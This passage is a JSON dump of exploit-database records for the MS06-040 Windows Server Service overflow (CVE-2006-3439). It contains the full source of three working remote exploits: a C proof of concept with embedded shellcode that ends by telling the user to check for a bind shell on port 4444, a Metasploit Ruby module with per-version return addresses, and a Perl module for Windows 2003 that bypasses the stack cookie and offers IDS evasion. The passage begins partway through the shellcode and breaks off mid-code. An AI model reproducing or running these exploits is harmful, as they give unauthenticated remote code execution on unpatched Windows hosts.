\"\\x88\\x83\\xeb\\xfc\\xe2\\xf4\\x29\\x53\\x6f\\x67\\x57\\x68\\xd4\\x74\\xc2\\x7c\"\r\n \"\\xdd\\x60\\x51\\x68\\x6f\\x77\\xc8\\x1c\\xfc\\xac\\x8c\\x1c\\xd5\\xb4\\x23\\xeb\"\r\n \"\\x95\\xf0\\xa9\\x78\\x1b\\xc7\\xb0\\x1c\\xcf\\xa8\\xa9\\x7c\\xd9\\x03\\x9c\\x1c\"\r\n \"\\x91\\x66\\x99\\x57\\x09\\x24\\x2c\\x57\\xe4\\x8f\\x69\\x5d\\x9d\\x89\\x6a\\x7c\"\r\n \"\\x64\\xb3\\xfc\\xb3\\xb8\\xfd\\x4d\\x1c\\xcf\\xac\\xa9\\x7c\\xf6\\x03\\xa4\\xdc\"\r\n \"\\x1b\\xd7\\xb4\\x96\\x7b\\x8b\\x84\\x1c\\x19\\xe4\\x8c\\x8b\\xf1\\x4b\\x99\\x4c\"\r\n \"\\xf4\\x03\\xeb\\xa7\\x1b\\xc8\\xa4\\x1c\\xe0\\x94\\x05\\x1c\\xd0\\x80\\xf6\\xff\"\r\n \"\\x1e\\xc6\\xa6\\x7b\\xc0\\x77\\x7e\\xf1\\xc3\\xee\\xc0\\xa4\\xa2\\xe0\\xdf\\xe4\"\r\n \"\\xa2\\xd7\\xfc\\x68\\x40\\xe0\\x63\\x7a\\x6c\\xb3\\xf8\\x68\\x46\\xd7\\x21\\x72\"\r\n 
\"\\xf6\\x09\\x45\\x9f\\x92\\xdd\\xc2\\x95\\x6f\\x58\\xc0\\x4e\\x99\\x7d\\x05\\xc0\"\r\n \"\\x6f\\x5e\\xfb\\xc4\\xc3\\xdb\\xfb\\xd4\\xc3\\xcb\\xfb\\x68\\x40\\xee\\xc0\\x86\"\r\n \"\\xcc\\xee\\xfb\\x1e\\x71\\x1d\\xc0\\x33\\x8a\\xf8\\x6f\\xc0\\x6f\\x5e\\xc2\\x87\"\r\n \"\\xc1\\xdd\\x57\\x47\\xf8\\x2c\\x05\\xb9\\x79\\xdf\\x57\\x41\\xc3\\xdd\\x57\\x47\"\r\n \"\\xf8\\x6d\\xe1\\x11\\xd9\\xdf\\x57\\x41\\xc0\\xdc\\xfc\\xc2\\x6f\\x58\\x3b\\xff\"\r\n \"\\x77\\xf1\\x6e\\xee\\xc7\\x77\\x7e\\xc2\\x6f\\x58\\xce\\xfd\\xf4\\xee\\xc0\\xf4\"\r\n \"\\xfd\\x01\\x4d\\xfd\\xc0\\xd1\\x81\\x5b\\x19\\x6f\\xc2\\xd3\\x19\\x6a\\x99\\x57\"\r\n \"\\x63\\x22\\x56\\xd5\\xbd\\x76\\xea\\xbb\\x03\\x05\\xd2\\xaf\\x3b\\x23\\x03\\xff\"\r\n \"\\xe2\\x76\\x1b\\x81\\x6f\\xfd\\xec\\x68\\x46\\xd3\\xff\\xc5\\xc1\\xd9\\xf9\\xfd\"\r\n \"\\x91\\xd9\\xf9\\xc2\\xc1\\x77\\x78\\xff\\x3d\\x51\\xad\\x59\\xc3\\x77\\x7e\\xfd\"\r\n \"\\x6f\\x77\\x9f\\x68\\x40\\x03\\xff\\x6b\\x13\\x4c\\xcc\\x68\\x46\\xda\\x57\\x47\"\r\n \"\\xf8\\x67\\x66\\x77\\xf0\\xdb\\x57\\x41\\x6f\\x58\";\r\n\r\nint main(int argc, char* argv[])\r\n{\r\n HANDLE hFile;\r\n NETRESOURCE nr;\r\n\r\n char szRemoteName[MAX_PATH], szPipePath[MAX_PATH];\r\n\r\n unsigned int i;\r\n\r\n unsigned char szInBuf[4096];\r\n unsigned long dwRead, nWritten;\r\n\r\n unsigned char szReqBuf[2096];\r\n\r\n if (argc < 3){\r\n printf(\"[-] Usage: ms06040poc <host> [target]\\n\");\r\n printf(\"\\t1 - Windows 2000 SP0-SP4\\n\");\r\n printf(\"\\t2 - Windows XP SP0-SP1\\n\");\r\n return -1;\r\n }\r\n\r\n memset(szReqBuf, 0, sizeof(szReqBuf));\r\n\r\n if (atoi(argv[2]) == 1) {\r\n unsigned char szBuff[1064];\r\n\r\n // build payload buffer\r\n memset(szBuff, '\\x90', 1000);\r\n memcpy(szBuff+630, sc, sizeof(sc));\r\n\r\n for(i=1000; i<1064; i+=4) {\r\n memcpy(szBuff+i, \"\\x04\\x08\\x02\\x00\", 4);\r\n }\r\n\r\n // build request buffer\r\n memcpy(szReqBuf, DCERPC_Request_RPC_Service, sizeof(DCERPC_Request_RPC_Service)-1);\r\n memcpy(szReqBuf+44, \"\\x15\\x02\\x00\\x00\", 4); /* 
max count */\r\n memcpy(szReqBuf+48, \"\\x00\\x00\\x00\\x00\", 4); /* offset */\r\n memcpy(szReqBuf+52, \"\\x15\\x02\\x00\\x00\", 4); /* actual count */\r\n memcpy(szReqBuf+56, szBuff, sizeof(szBuff));\r\n memcpy(szReqBuf+1120, \"\\x00\\x00\\x00\\x00\", 4); /* align string */\r\n memcpy(szReqBuf+1124, DCERPC_Request_RPC_Service_, sizeof(DCERPC_Request_RPC_Service_)-1);\r\n memcpy(szReqBuf+1140 , \"\\xeb\\x02\", 2);\r\n }\r\n if (atoi(argv[2]) == 2) {\r\n unsigned char szBuff[708];\r\n\r\n memset(szBuff, '\\x90', 612); /* size of shellcode */\r\n memcpy(szBuff, sc, sizeof(sc));\r\n\r\n memcpy(szBuff+612, \"\\x0a\\x08\\x02\\x00\", 4);\r\n memset(szBuff+616, 'A', 8); // 8 bytes padding\r\n memcpy(szBuff+624, \"\\x04\\x08\\x02\\x00\", 4);\r\n memset(szBuff+628, '\\x90', 32);\r\n memcpy(szBuff+660, \"\\x04\\x08\\x02\\x00\", 4);\r\n memset(szBuff+664, 'B', 8); // 8 bytes padding\r\n memcpy(szBuff+672, \"\\x04\\x08\\x02\\x00\", 4);\r\n memset(szBuff+676, '\\x90', 32);\r\n\r\n // build request buffer\r\n memcpy(szReqBuf, DCERPC_Request_RPC_Service, sizeof(DCERPC_Request_RPC_Service)-1);\r\n memcpy(szReqBuf+44, \"\\x63\\x01\\x00\\x00\", 4); /* max count */\r\n memcpy(szReqBuf+48, \"\\x00\\x00\\x00\\x00\", 4); /* offset */\r\n memcpy(szReqBuf+52, \"\\x63\\x01\\x00\\x00\", 4); /* actual count */\r\n memcpy(szReqBuf+56, szBuff, sizeof(szBuff));\r\n memcpy(szReqBuf+764, \"\\x00\\x00\\x00\\x00\", 4); /* align string */\r\n memcpy(szReqBuf+768, DCERPC_Request_RPC_Service_, sizeof(DCERPC_Request_RPC_Service_)-1);\r\n }\r\n\r\n printf(\"[+] Connecting to %s ... 
\\n\", argv[1]);\r\n\r\n _snprintf(szRemoteName, sizeof(szRemoteName), \"\\\\\\\\%s\\\\ipc$\", argv[1]);\r\n nr.dwType = RESOURCETYPE_ANY;\r\n nr.lpLocalName = NULL;\r\n nr.lpProvider = NULL;\r\n nr.lpRemoteName = szRemoteName;\r\n if (WNetAddConnection2(&nr, \"\", \"\", 0) != NO_ERROR) {\r\n printf(\"[-] Failed to connect to host !\\n\");\r\n return -1;\r\n }\r\n\r\n _snprintf(szPipePath, sizeof(szPipePath), \"\\\\\\\\%s\\\\pipe\\\\browser\", argv[1]);\r\n hFile = CreateFile(szPipePath, GENERIC_READ|GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);\r\n\r\n if (hFile == INVALID_HANDLE_VALUE) {\r\n printf(\"[-] Failed to open named pipe !\\n\");\r\n return -1;\r\n }\r\n\r\n printf(\"[+] Binding to RPC interface ... \\n\");\r\n if (TransactNamedPipe(hFile, DCERPC_Bind_RPC_Service, sizeof(DCERPC_Bind_RPC_Service), szInBuf, sizeof(szInBuf), &dwRead, NULL) == 0) {\r\n printf(\"[-] Failed to bind to interface !\\n\");\r\n CloseHandle(hFile);\r\n return -1;\r\n }\r\n\r\n printf(\"[+] Sending RPC request ... \\n\");\r\n if (!WriteFile(hFile, szReqBuf, sizeof(szReqBuf), &nWritten, 0)) {\r\n printf(\"[-] Unable to transmit RPC request !\\n\");\r\n CloseHandle(hFile);\r\n return -1;\r\n }\r\n\r\n printf(\"[+] Now check for shell on %s:4444 !\\n\", argv[1]);\r\n\r\n return 0;\r\n}\r\n\r\n// milw0rm.com [2006-08-28]\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/2265/"}, {"lastseen": "2016-02-01T23:42:35", "bulletinFamily": "exploit", "description": "Microsoft Server Service NetpwPathCanonicalize Overflow. CVE-2006-3439. 
Remote exploit for windows platform", "modified": "2011-02-17T00:00:00", "published": "2011-02-17T00:00:00", "id": "EDB-ID:16367", "href": "https://www.exploit-db.com/exploits/16367/", "type": "exploitdb", "title": "Microsoft Server Service NetpwPathCanonicalize Overflow", "sourceData": "##\r\n# $Id: ms06_040_netapi.rb 11762 2011-02-17 03:56:15Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = GreatRanking\r\n\r\n\tinclude Msf::Exploit::Remote::DCERPC\r\n\tinclude Msf::Exploit::Remote::SMB\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Microsoft Server Service NetpwPathCanonicalize Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a stack buffer overflow in the NetApi32 CanonicalizePathName() function\r\n\t\t\t\tusing the NetpwPathCanonicalize RPC call in the Server Service. It is likely that\r\n\t\t\t\tother RPC calls could be used to exploit this service. This exploit will result in\r\n\t\t\t\ta denial of service on Windows XP SP2 or Windows 2003 SP1. A failed exploit attempt\r\n\t\t\t\twill likely result in a complete reboot on Windows 2000 and the termination of all\r\n\t\t\t\tSMB-related services on Windows XP. 
The default target for this exploit should succeed\r\n\t\t\t\ton Windows NT 4.0, Windows 2000 SP0-SP4+, Windows XP SP0-SP1 and Windows 2003 SP0.\r\n\t\t\t},\r\n\t\t\t'Author' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'hdm'\r\n\t\t\t\t],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Version' => '$Revision: 11762 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2006-3439' ],\r\n\t\t\t\t\t[ 'OSVDB', '27845' ],\r\n\t\t\t\t\t[ 'BID', '19409' ],\r\n\t\t\t\t\t[ 'MSB', 'MS06-040' ],\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'thread',\r\n\t\t\t\t},\r\n\t\t\t'Privileged' => true,\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t# Technically we can use more space than this, but by limiting it\r\n\t\t\t\t\t# to 370 bytes we can use the same request for all Windows SPs.\r\n\t\t\t\t\t'Space' => 370,\r\n\t\t\t\t\t'BadChars' => \"\\x00\\x0a\\x0d\\x5c\\x5f\\x2f\\x2e\",\r\n\t\t\t\t\t'StackAdjustment' => -3500,\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'DefaultTarget' => 0,\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ '(wcscpy) Automatic (NT 4.0, 2000 SP0-SP4, XP SP0-SP1)', { } ],\r\n\t\t\t\t\t[ '(wcscpy) Windows NT 4.0 / Windows 2000 SP0-SP4',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Offset' => 1000,\r\n\t\t\t\t\t\t\t'Ret' => 0x00020804\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t\t[ '(wcscpy) Windows XP SP0/SP1',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Offset' => 612,\r\n\t\t\t\t\t\t\t'Ret' => 0x00020804\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t\t[ '(stack) Windows XP SP1 English',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'OffsetA' => 656,\r\n\t\t\t\t\t\t\t'OffsetB' => 680,\r\n\t\t\t\t\t\t\t'Ret' => 0x71ab1d54 # jmp esp @ ws2_32.dll\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t\t[ '(stack) Windows XP SP1 Italian',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'OffsetA' => 656,\r\n\t\t\t\t\t\t\t'OffsetB' => 680,\r\n\t\t\t\t\t\t\t'Ret' => 0x71a37bfb # jmp esp @ ws2_32.dll\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t\t[ '(wcscpy) Windows 2003 
SP0',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Offset' => 612,\r\n\t\t\t\t\t\t\t'Ret' => 0x00020804\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t],\r\n\r\n\t\t\t'DisclosureDate' => 'Aug 8 2006'))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOptString.new('SMBPIPE', [ true, \"The pipe name to use (BROWSER, SRVSVC)\", 'BROWSER']),\r\n\t\t\t], self.class)\r\n\r\n\tend\r\n\r\n\tdef exploit\r\n\r\n\t\tconnect()\r\n\t\tsmb_login()\r\n\r\n\t\tmytarget = target\r\n\t\tif (not target) or (target.name =~ /Automatic/)\r\n\t\t\tcase smb_peer_os()\r\n\t\t\t\twhen 'Windows 5.0'\r\n\t\t\t\t\tprint_status(\"Detected a Windows 2000 target\")\r\n\t\t\t\t\tmytarget = targets[1]\r\n\r\n\t\t\t\twhen 'Windows NT 4.0'\r\n\t\t\t\t\tprint_status(\"Detected a Windows NT 4.0 target\")\r\n\t\t\t\t\tmytarget = targets[1]\r\n\r\n\t\t\t\twhen 'Windows 5.1'\r\n\t\t\t\t\tbegin\r\n\t\t\t\t\t\tsmb_create(\"\\\\SRVSVC\")\r\n\t\t\t\t\t\tprint_status(\"Detected a Windows XP SP0/SP1 target\")\r\n\t\t\t\t\trescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e\r\n\t\t\t\t\t\tif (e.error_code == 0xc0000022)\r\n\t\t\t\t\t\t\tprint_status(\"Windows XP SP2 is not exploitable\")\r\n\t\t\t\t\t\t\treturn\r\n\t\t\t\t\t\tend\r\n\t\t\t\t\t\tprint_status(\"Detected a Windows XP target (unknown patch level)\")\r\n\t\t\t\t\tend\r\n\t\t\t\t\tmytarget = targets[2]\r\n\r\n\t\t\t\twhen /Windows Server 2003 (\\d+)$/\r\n\t\t\t\t\tprint_status(\"Detected a Windows 2003 SP0 target\")\r\n\t\t\t\t\tmytarget = targets[5]\r\n\r\n\t\t\t\twhen /Windows Server 2003 (\\d+) Service Pack (\\d+)/\r\n\t\t\t\t\tprint_status(\"Windows 2003 SP#{$2} is not exploitable\")\r\n\t\t\t\t\treturn\r\n\r\n\t\t\t\twhen /Samba/\r\n\t\t\t\t\tprint_status(\"Samba is not vulnerable\")\r\n\t\t\t\t\treturn\r\n\r\n\t\t\t\telse\r\n\t\t\t\t\tprint_status(\"No target detected for #{smb_peer_os()}/#{smb_peer_lm()}...\")\r\n\t\t\t\t\treturn\r\n\t\t\tend\r\n\t\tend\r\n\r\n\t\t# Specific fixups for Windows NT\r\n\t\tcase smb_peer_os()\r\n\t\twhen 'Windows NT 
4.0'\r\n\t\t\tprint_status(\"Adjusting the SMB/DCERPC parameters for Windows NT\")\r\n\t\t\tdatastore['SMB::pipe_write_min_size'] = 2048\r\n\t\t\tdatastore['SMB::pipe_write_max_size'] = 4096\r\n\t\tend\r\n\r\n\t\thandle = dcerpc_handle(\r\n\t\t\t'4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0',\r\n\t\t\t'ncacn_np', [\"\\\\#{datastore['SMBPIPE']}\"]\r\n\t\t)\r\n\r\n\t\tprint_status(\"Binding to #{handle} ...\")\r\n\t\tdcerpc_bind(handle)\r\n\t\tprint_status(\"Bound to #{handle} ...\")\r\n\r\n\t\t#\r\n\t\t# /* Function 0x1f at 0x767e912c */\r\n\t\t# long function_1f (\r\n\t\t# [in] [unique] [string] wchar_t * arg_00,\r\n\t\t# [in] [string] wchar_t * arg_01,\r\n\t\t# [out] [size_is(arg_03)] char * arg_02,\r\n\t\t# [in] [range(0, 64000)] long arg_03,\r\n\t\t# [in] [string] wchar_t * arg_04,\r\n\t\t# [in,out] long * arg_05,\r\n\t\t# [in] long arg_06\r\n\t\t# );\r\n\t\t#\r\n\r\n\t\tprint_status(\"Building the stub data...\")\r\n\t\tstub = ''\r\n\r\n\t\tcase mytarget.name\r\n\r\n\t\t# This covers NT 4.0 as well\r\n\t\twhen /wcscpy.*Windows 2000/\r\n\r\n\t\t\tcode = make_nops(mytarget['Offset'] - payload.encoded.length) + payload.encoded\r\n\r\n\t\t\tpath = code + ( [mytarget.ret].pack('V') * 16 ) + \"\\x00\\x00\"\r\n\r\n\t\t\tstub =\r\n\t\t\t\tNDR.long(rand(0xffffffff)) +\r\n\t\t\t\tNDR.UnicodeConformantVaryingString('') +\r\n\t\t\t\tNDR.UnicodeConformantVaryingStringPreBuilt(path) +\r\n\t\t\t\tNDR.long(rand(250)+1) +\r\n\t\t\t\tNDR.UnicodeConformantVaryingStringPreBuilt(\"\\xeb\\x02\\x00\\x00\") +\r\n\t\t\t\tNDR.long(rand(250)+1) +\r\n\t\t\t\tNDR.long(0)\r\n\r\n\t\twhen /wcscpy.*Windows XP/\r\n\t\t\tpath =\r\n\t\t\t\t# Payload goes first\r\n\t\t\t\tpayload.encoded +\r\n\r\n\t\t\t\t# Padding\r\n\t\t\t\trand_text_alphanumeric(mytarget['Offset'] - payload.encoded.length) +\r\n\r\n\t\t\t\t# Land 6 bytes in to bypass garbage (XP SP0)\r\n\t\t\t\t[ mytarget.ret + 6 ].pack('V') +\r\n\r\n\t\t\t\t# Padding\r\n\t\t\t\trand_text_alphanumeric(8) +\r\n\r\n\t\t\t\t# Address to write our 
shellcode (XP SP0)\r\n\t\t\t\t[ mytarget.ret ].pack('V') +\r\n\r\n\t\t\t\t# Padding\r\n\t\t\t\trand_text_alphanumeric(32) +\r\n\r\n\t\t\t\t# Jump straight to shellcode (XP SP1)\r\n\t\t\t\t[ mytarget.ret ].pack('V') +\r\n\r\n\t\t\t\t# Padding\r\n\t\t\t\trand_text_alphanumeric(8) +\r\n\r\n\t\t\t\t# Address to write our shellcode (XP SP1)\r\n\t\t\t\t[ mytarget.ret ].pack('V') +\r\n\r\n\t\t\t\t# Padding\r\n\t\t\t\trand_text_alphanumeric(32) +\r\n\r\n\t\t\t\t# Terminate the path\r\n\t\t\t\t\"\\x00\\x00\"\r\n\r\n\t\t\tstub =\r\n\t\t\t\tNDR.long(rand(0xffffffff)) +\r\n\t\t\t\tNDR.UnicodeConformantVaryingString('') +\r\n\t\t\t\tNDR.UnicodeConformantVaryingStringPreBuilt(path) +\r\n\t\t\t\tNDR.long(rand(0xf0)+1) +\r\n\t\t\t\tNDR.UnicodeConformantVaryingString('') +\r\n\t\t\t\tNDR.long(rand(0xf0)+1) +\r\n\t\t\t\tNDR.long(0)\r\n\r\n\r\n\t\twhen /stack/\r\n\t\t\tbuff = rand_text_alphanumeric(800)\r\n\t\t\tbuff[0, payload.encoded.length] = payload.encoded\r\n\t\t\tbuff[ mytarget['OffsetA'], 4 ] = [mytarget.ret].pack('V')\r\n\t\t\tbuff[ mytarget['OffsetB'], 5 ] = \"\\xe9\" + [ (mytarget['OffsetA'] + 5) * -1 ].pack('V')\r\n\r\n\t\t\tpath = \"\\\\\\x00\\\\\\x00\" + buff + \"\\x00\\x00\"\r\n\r\n\t\t\tstub =\r\n\t\t\t\tNDR.long(rand(0xffffffff)) +\r\n\t\t\t\tNDR.UnicodeConformantVaryingString('') +\r\n\t\t\t\tNDR.UnicodeConformantVaryingStringPreBuilt(path) +\r\n\t\t\t\tNDR.long(rand(0xf0)+1) +\r\n\t\t\t\tNDR.UnicodeConformantVaryingString('') +\r\n\t\t\t\tNDR.long(rand(0xf0)+1) +\r\n\t\t\t\tNDR.long(0)\r\n\r\n\r\n\t\twhen /wcscpy.*Windows 2003/\r\n\t\t\tpath =\r\n\t\t\t\t# Payload goes first\r\n\t\t\t\tpayload.encoded +\r\n\r\n\t\t\t\t# Padding\r\n\t\t\t\trand_text_alphanumeric(mytarget['Offset'] - payload.encoded.length) +\r\n\r\n\t\t\t\t# Padding\r\n\t\t\t\trand_text_alphanumeric(32) +\r\n\r\n\t\t\t\t# The cookie is constant,\r\n\t\t\t\t# noticed by Nicolas Pouvesle in Misc #28\r\n\t\t\t\t\"\\x4e\\xe6\\x40\\xbb\" +\r\n\r\n\t\t\t\t# Padding\r\n\t\t\t\trand_text_alphanumeric(4) 
+\r\n\r\n\t\t\t\t# Jump straight to shellcode\r\n\t\t\t\t[ mytarget.ret ].pack('V') +\r\n\r\n\t\t\t\t# Padding\r\n\t\t\t\trand_text_alphanumeric(8) +\r\n\r\n\t\t\t\t# Address to write our shellcode\r\n\t\t\t\t[ mytarget.ret ].pack('V') +\r\n\r\n\t\t\t\t# Padding\r\n\t\t\t\trand_text_alphanumeric(40) +\r\n\r\n\t\t\t\t# Terminate the path\r\n\t\t\t\t\"\\x00\\x00\"\r\n\r\n\t\t\tstub =\r\n\t\t\t\tNDR.long(rand(0xffffffff)) +\r\n\t\t\t\tNDR.UnicodeConformantVaryingString('') +\r\n\t\t\t\tNDR.UnicodeConformantVaryingStringPreBuilt(path) +\r\n\t\t\t\tNDR.long(rand(0xf0)+1) +\r\n\t\t\t\tNDR.UnicodeConformantVaryingString('') +\r\n\t\t\t\tNDR.long(rand(0xf0)+1) +\r\n\t\t\t\tNDR.long(0)\r\n\r\n\t\tend\r\n\r\n\t\tprint_status(\"Calling the vulnerable function...\")\r\n\r\n\t\tbegin\r\n\t\t\tdcerpc.call(0x1f, stub, false)\r\n\t\t\tdcerpc.call(0x1f, stub, false)\r\n\t\trescue Rex::Proto::DCERPC::Exceptions::NoResponse\r\n\t\trescue => e\r\n\t\t\tif e.to_s !~ /STATUS_PIPE_DISCONNECTED/\r\n\t\t\t\traise e\r\n\t\t\tend\r\n\t\tend\r\n\r\n\t\t# Cleanup\r\n\t\thandler\r\n\t\tdisconnect\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/16367/"}, {"lastseen": "2016-01-31T16:04:50", "bulletinFamily": "exploit", "description": "MS Windows NetpIsRemote() Remote Overflow Exploit (MS06-040) (2k3). CVE-2006-3439. 
Remote exploit for windows platform", "modified": "2006-09-13T00:00:00", "published": "2006-09-13T00:00:00", "id": "EDB-ID:2355", "href": "https://www.exploit-db.com/exploits/2355/", "type": "exploitdb", "title": "Microsoft Windows 2003 - NetpIsRemote Remote Overflow Exploit MS06-040", "sourceData": "#########################################################################\r\n# netapi_win2003.pm (MS06-040 Exploit for Windows Server 2003 SP0)\r\n#\r\n# Author: Trirat Puttaraksa (Kira) <trir00t [at] gmail.com>\r\n#\r\n# http://sf-freedom.blogspot.com\r\n# \r\n# For educational purpose only\r\n#\r\n# Note: This exploit is developed because of my question \"Is it exploitable\r\n# on Windows Server 2003 platform ?\". As I know, Windows XP SP2 and Windows\r\n# Server 2003 SP1 is not exploitable because they are compiled with /GS, but\r\n# how about Windows Server 2003 SP0 ? In metasploit netapi_ms06_040.pm there\r\n# is no Windows Server 2003 sp0 target, this means 2003 SP0 is not \r\n# exploitable ? There is Stack Protection Windows Server 2003, is this the\r\n# reasons why there is no Windows Server 2003 SP0 exploit for MS06-040 ?\r\n#\r\n# I start to modify H D Moore's exploit (netapi_ms06_040.pm - credits to him\r\n# ^-^) and work on it. The problem is the Stack Protection \"security cookie \r\n# checking\". Because wcscpy() method allow me to write to any memory location\r\n# that are marked writable, I decide to write to the location at \"security\r\n# cookie\" is stored and it works !!! I will describe more implementation details\r\n# in my blog in few days ^-^ \r\n#\r\n# This exploit tested on Windows Server 2003 SP0 build 3790 and successful \r\n# exploit 2003 machine in my environment - all patch before MS06-040 \r\n# (KB921883). It's quite reliable but not 100%. There is the possibility that\r\n# the exploit will fail and the target system process crash. 
Because I have \r\n# only one testbase system, I couldn't confirm this exploit will work on \r\n# your environment. However feel free to e-mail to me.\r\n#\r\n# Credits: H D Moore\r\n#########################################################################\r\n\r\npackage Msf::Exploit::netapi_win2003;\r\nuse base \"Msf::Exploit\";\r\nuse strict;\r\n\r\nuse Pex::DCERPC;\r\nuse Pex::NDR;\r\n\r\nmy $advanced = {\r\n\t'FragSize' => [ 256, 'The DCERPC fragment size' ],\r\n\t'BindEvasion' => [ 0, 'IDS Evasion of the bind request' ],\r\n\t'DirectSMB' => [ 0, 'Use direct SMB (445/tcp)' ],\r\n };\r\n\r\nmy $info = {\r\n\t'Name' => 'MSO6-040 Windows Server 2003 Target',\r\n\t'Version' => '',\r\n\t'Authors' =>\r\n\t [\r\n\t\t'Trirat Puttaraksa (Kira) <trir00t [at] gmail.com>',\r\n\t ],\r\n\r\n\t'Arch' => ['x86'],\r\n\t'OS' => [ 'win32', 'win2003' ],\r\n\t'Priv' => 1,\r\n\r\n\t'AutoOpts' => { 'EXITFUNC' => 'thread' },\r\n\t\r\n\t'UserOpts' =>\r\n\t {\r\n\t\t'RHOST' => [ 1, 'ADDR', 'The target address' ],\r\n\r\n\t\t# SMB connection options\r\n\t\t'SMBUSER' => [ 0, 'DATA', 'The SMB username to connect with', '' ],\r\n\t\t'SMBPASS' => [ 0, 'DATA', 'The password for specified SMB username', '' ],\r\n\t\t'SMBDOM' => [ 0, 'DATA', 'The domain for specified SMB username', '' ],\r\n\t },\r\n\r\n\t'Payload' =>\r\n\t {\r\n\t \t# Technically we can use more space than this, but by limiting it\r\n\t\t# to 370 bytes we can use the same request for all Windows SPs.\r\n\t\t'Space' => 370,\r\n\t\t\r\n\t\t'BadChars' => \"\\x00\\x0a\\x0d\\x5c\\x5f\\x2f\\x2e\",\r\n\t\t'Keys' => ['+ws2ord'],\r\n\r\n\t\t# sub esp, 4097 + inc esp makes stack happy\r\n\t\t'Prepend' => \"\\x81\\xc4\\xff\\xef\\xff\\xff\\x44\",\r\n\t },\r\n\r\n\t'Description' => Pex::Text::Freeform(\r\n\t\tqq{\r\n\t\tThis exploit modified from netapi_ms06_040.pm (Metasploit).\r\n\t\tWhile netapi_ms06_040 of metasploit works on Windows 2000 \r\n\t\tSP0 - SP4 and Windows XP SP0 - SP1, this exploit works on\r\n\t\tWindows Server 2003 
SP0.\r\n\t }\r\n\t ),\r\n\r\n\t'Refs' =>\r\n\t [\r\n\t\t[ 'BID', '19409' ],\r\n\t\t[ 'CVE', '2006-3439' ],\r\n\t\t[ 'MSB', 'MS06-040' ],\r\n\t ],\r\n\r\n\t'DefaultTarget' => 0,\r\n\t'Targets' =>\r\n\t [\r\n\t\t[ '(wcscpy) Windows Server 2003 SP0', 612],\r\n\t ],\r\n\r\n\t'Keys' => ['srvsvc'],\r\n\r\n\t'DisclosureDate' => '',\r\n };\r\n\r\nsub new {\r\n\tmy ($class) = @_;\r\n\tmy $self =\r\n\t $class->SUPER::new( { 'Info' => $info, 'Advanced' => $advanced }, @_ );\r\n\treturn ($self);\r\n}\r\n\r\nsub Exploit {\r\n\tmy ($self) = @_;\r\n\tmy $target_host = $self->GetVar('RHOST');\r\n\tmy $target_port = $self->GetVar('RPORT');\r\n\tmy $target_idx = $self->GetVar('TARGET');\r\n\tmy $shellcode = $self->GetVar('EncodedPayload')->Payload;\r\n\tmy $target_name = '*SMBSERVER';\r\n\r\n\tmy $FragSize = $self->GetVar('FragSize') || 256;\r\n\tmy $target = $self->Targets->[$target_idx];\r\n\r\n\tif (!$self->InitNops(128)) {\r\n\t\t$self->PrintLine(\"Could not initialize the nop module\");\r\n\t\treturn;\r\n\t}\r\n\r\n\tmy ( $res, $rpc );\r\n\r\n\tmy $pipe = '\\BROWSER';\r\n\tmy $uuid = '4b324fc8-1670-01d3-1278-5a47bf6ee188';\r\n\tmy $version = '3.0';\r\n\r\n\tmy $handle = Pex::DCERPC::build_handle( $uuid, $version, 'ncacn_np', $target_host, $pipe );\r\n\r\n\tmy $dce = Pex::DCERPC->new(\r\n\t\t'handle' => $handle,\r\n\t\t'username' => $self->GetVar('SMBUSER'),\r\n\t\t'password' => $self->GetVar('SMBPASS'),\r\n\t\t'domain' => $self->GetVar('SMBDOM'),\r\n\t\t'fragsize' => $self->GetVar('FragSize'),\r\n\t\t'bindevasion' => $self->GetVar('BindEvasion'),\r\n\t\t'directsmb' => $self->GetVar('DirectSMB'),\r\n\t );\r\n\r\n\tif ( !$dce ) {\r\n\t\t$self->PrintLine(\"[*] Could not bind to $handle\");\r\n\t\treturn;\r\n\t}\r\n\r\n\tmy $smb = $dce->{'_handles'}{$handle}{'connection'};\r\n\t\r\n\tif (! 
